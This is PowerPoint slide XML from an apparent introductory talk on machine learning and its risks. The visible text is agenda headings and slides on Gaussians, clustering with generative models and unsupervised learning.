            <a:ext cx="6472362" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="057FAF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5082213" y="979996"/>
            <a:ext cx="6472362" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="58C3C4"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" charset="0"/>
                <a:ea typeface="Montserrat" charset="0"/>
                <a:cs typeface="Montserrat" charset="0"/>
              </a:rPr>
              <a:t>When algorithms don’t play nice with our applications and lives.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288077" y="1745639"/>
            <a:ext cx="2980434"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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="279997" y="95851"/>
            <a:ext cx="3203814" cy="1985597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298E8106-11EE-4872-873C-110DBB8005A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172882"/>
            <a:ext cx="12192000" cy="4705350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105682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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41170" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456497" y="1492930"/>
            <a:ext cx="7719071" cy="5390746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4591061D-E9DB-4F96-BE42-778994A7C006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6243182" y="1877333"/>
            <a:ext cx="4260916" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WHAT IS A GAUSSIAN?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1E694C-EFAC-418B-AAD0-538F14B27A27}"/>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5415430" y="2536709"/>
            <a:ext cx="4805745" cy="3597391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226530C8-5A6C-48C3-BB40-731C676B06FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:grayscl/>
          </a:blip>
          <a:srcRect b="18881"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11967" y="1486183"/>
            <a:ext cx="4468464" cy="5454465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6097A56A-AF50-4207-9241-64F6FC530872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1480348"/>
            <a:ext cx="4458821" cy="5438840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3050D6D-375D-41C5-B2BD-6175A5B48E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293873" y="1767690"/>
            <a:ext cx="3601423" cy="4801897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3361497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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275422" y="883161"/>
            <a:ext cx="11916577" cy="5974839"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="608331"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2A1B01-734D-4D79-8FB6-1BA9C1E7EEB0}"/>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239383" y="2790838"/>
            <a:ext cx="7056191" cy="4013171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{227DE10B-0341-43AC-AC67-9692CA040292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:grayscl/>
          </a:blip>
          <a:srcRect l="31069" r="18135"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8082389" y="1487393"/>
            <a:ext cx="4126147" cy="5422503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2607B308-206A-49F4-84FF-E41E5E23C80A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8074385" y="1486184"/>
            <a:ext cx="4287023" cy="5608637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C765812D-0D82-4C96-AC73-E74A190DDCF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8335118" y="3227763"/>
            <a:ext cx="3126091" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generative model in Action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Decide on the number of clusters (4 in this case )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assume data is generated using Gaussian distribution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tune the parameters until the best model to fit the data is achieved*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1813F5-7E15-42FB-A5EC-0AFA1A73A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="6216212"/>
            <a:ext cx="4572000" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="90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US" sz="700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Nerd alert: Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expectimisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="70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US" sz="700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Maximisation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7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39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6670903D-A16F-410A-A4F7-BE40B0FD50A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186712" y="1693436"/>
            <a:ext cx="3621841" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UNSUPERVISED LEARNING </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
